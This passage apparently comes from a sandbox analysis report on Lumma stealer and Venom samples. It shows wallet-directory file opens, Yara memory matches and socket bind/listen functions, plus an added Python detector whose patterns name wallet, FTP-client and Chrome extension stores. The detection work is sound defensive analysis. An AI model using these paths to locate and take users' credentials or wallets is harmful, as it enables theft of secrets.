Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Directory queried: C:\Users\user\Documents\JSDNGYCOWY
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Directory queried: C:\Users\user\Documents\JSDNGYCOWY
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Directory queried: C:\Users\user\Documents\JSDNGYCOWY
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Directory queried: C:\Users\user\Documents\JSDNGYCOWY
Source: Yara match File source: 00000014.00000003.2719411420.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2718324316.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2763564207.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2707939700.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2721074628.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2711751965.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2709067186.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2748207856.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2722685463.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2773942055.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2710272272.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2775761675.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2775010312.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2718700898.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2732789726.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2727794367.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2745784061.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2719069820.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2728924066.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2750455743.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2723831402.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2754315012.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2771030562.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2730614080.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.2639948784.0000000003385000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2722975569.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2722293127.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2725597045.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2710789516.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2731443501.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2727021426.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2739250905.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2752660197.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2723350462.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2717828329.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2729723839.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2742008984.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2724319284.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2719837852.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2758698968.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.2641040146.000000000339A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2712752600.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2708630118.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2720461285.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2723578701.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2776713870.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2709425856.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2755765859.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2728281717.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2782316881.0000000000560000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2721584393.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2734445019.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2709861506.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: BitLockerToGo.exe PID: 1988, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: lm.exe PID: 5724, type: MEMORYSTR
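The "File opened" entries above are the most actionable part of this section: both lm.exe and the Windows-signed BitLockerToGo.exe enumerate the same crypto-wallet, FTP-client and Chrome extension-storage directories, which is the access pattern of a stealer rather than of any of those applications. The script below is an added example, not part of the Joe Sandbox report or of any of the detected families' code. It parses lines in the report's own "Source: <image> File opened: <path>" form, buckets each path into the categories seen here, and flags a process that reads across unrelated credential stores, reads many distinct targets, or runs from under C:\Windows\ yet reads any of them (a heuristic for a hollowed or injected host). The thresholds, the category names and the embedded sample log are assumptions; the sample mirrors the report's lines plus two constructed benign lines (the wallet app and Chrome reading their own data) to show that single-store access is not flagged.

```python
"""Flag processes whose file-access pattern matches a credential/wallet stealer.

Added example; not part of the Joe Sandbox report. Parses "Source: <image>
File opened: <path>" lines, classifies the path, and scores each image.
Thresholds, category names and the sample log are assumptions.
"""
import re
from collections import defaultdict
from typing import Dict, Optional

# Directory patterns taken from the "File opened" entries in the report.
# Chrome extension IDs are 32 characters drawn from a-p, hence [a-p]{32}.
CATEGORIES = {
    "wallet": [
        r"\\AppData\\Roaming\\Exodus\\exodus\.wallet",
        r"\\AppData\\Roaming\\Ledger Live",
        r"\\AppData\\Roaming\\atomic\\Local Storage\\leveldb",
        r"\\AppData\\Local\\Coinomi\\Coinomi\\wallets",
        r"\\AppData\\Roaming\\Bitcoin\\wallets",
        r"\\AppData\\Roaming\\Binance",
        r"\\AppData\\Roaming\\com\.liberty\.jaxx\\IndexedDB",
        r"\\AppData\\Roaming\\Electrum(-LTC)?\\wallets",
        r"\\AppData\\Roaming\\Guarda\\IndexedDB",
    ],
    "ftp_client": [
        r"\\AppData\\Roaming\\FTPGetter",
        r"\\AppData\\Roaming\\FTPInfo",
        r"\\AppData\\Roaming\\SmartFTP\\Client 2\.0\\Favorites",
        r"\\AppData\\Roaming\\FTPbox",
        r"\\AppData\\Roaming\\FTPRush",
        r"\\ProgramData\\SiteDesigner\\3D-FTP",
    ],
    "browser": [
        r"\\Google\\Chrome\\User Data\\[^\\]+\\Local Extension Settings\\[a-p]{32}(\\|$)",
        r"\\Google\\Chrome\\User Data\\[^\\]+\\Web Data$",
    ],
}
_COMPILED = {cat: [re.compile(p, re.IGNORECASE) for p in pats]
             for cat, pats in CATEGORIES.items()}
_LINE = re.compile(r"^Source:\s+(?P<image>.+?)\s+File opened:\s+(?P<path>.+?)\s*$")

MIN_TARGETS = 3  # assumed threshold: distinct sensitive paths per process


def classify(path: str) -> Optional[str]:
    """Return the category a path belongs to, or None if it is not sensitive."""
    for cat, regs in _COMPILED.items():
        if any(r.search(path) for r in regs):
            return cat
    return None


def analyse(log_text: str, min_targets: int = MIN_TARGETS) -> Dict[str, dict]:
    """Map each suspicious image path to its categories, target count and reasons."""
    hits: Dict[str, Dict[str, set]] = defaultdict(lambda: defaultdict(set))
    for line in log_text.splitlines():
        m = _LINE.match(line.strip())
        if not m:
            continue  # "Directory queried", Yara lines etc. are not file opens
        cat = classify(m["path"])
        if cat:
            hits[m["image"]][cat].add(m["path"].lower())  # dedupe repeated opens

    findings: Dict[str, dict] = {}
    for image, cats in hits.items():
        targets = sum(len(paths) for paths in cats.values())
        system_image = image.lower().startswith("c:\\windows\\")
        reasons = []
        if len(cats) >= 2:
            reasons.append(f"reads {len(cats)} unrelated credential stores: {sorted(cats)}")
        if targets >= min_targets:
            reasons.append(f"reads {targets} distinct sensitive paths")
        if system_image:
            reasons.append("image under C:\\Windows\\ has no reason to read wallet/FTP data "
                           "(heuristic: code running in a hollowed or injected host)")
        if reasons:
            findings[image] = {"categories": sorted(cats), "targets": targets,
                               "system_image": system_image, "reasons": reasons}
    return findings


# Constructed sample in the report's own line format (not a real capture).
SAMPLE_LOG = r"""
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Programs\Exodus\Exodus.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Directory queried: C:\Users\user\Documents
"""

if __name__ == "__main__":
    for image, finding in analyse(SAMPLE_LOG).items():
        print(image)
        for reason in finding["reasons"]:
            print("   -", reason)
```

Run as-is it reports lm.exe and BitLockerToGo.exe and stays silent on Exodus.exe and chrome.exe; the same classifier can be pointed at Sysmon Event ID 11 or EDR file-access telemetry by swapping the line parser, and the category lists should be extended with the other FTP clients and wallets a given environment actually runs.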

Remote Access Functionality

Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 9.2.EF14.exe.7ff71bc40000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.EF14.exe.7ff71bc40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.2570610433.00007FF71C180000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.2414575122.00007FF71C180000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: EF14.exe PID: 3868, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\EF14.exe, type: DROPPED
Source: Yara match File source: Process Memory Space: BitLockerToGo.exe PID: 1988, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: lm.exe PID: 5724, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 00000003.00000002.1941543133.00000000001D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1941477566.00000000001A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1718024777.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1717820306.00000000001E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_6C8D9E10 bind,listen,WSAGetLastError,closesocket, 19_2_6C8D9E10
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Code function: 20_2_6C869E10 bind,listen,WSAGetLastError,closesocket, 20_2_6C869E10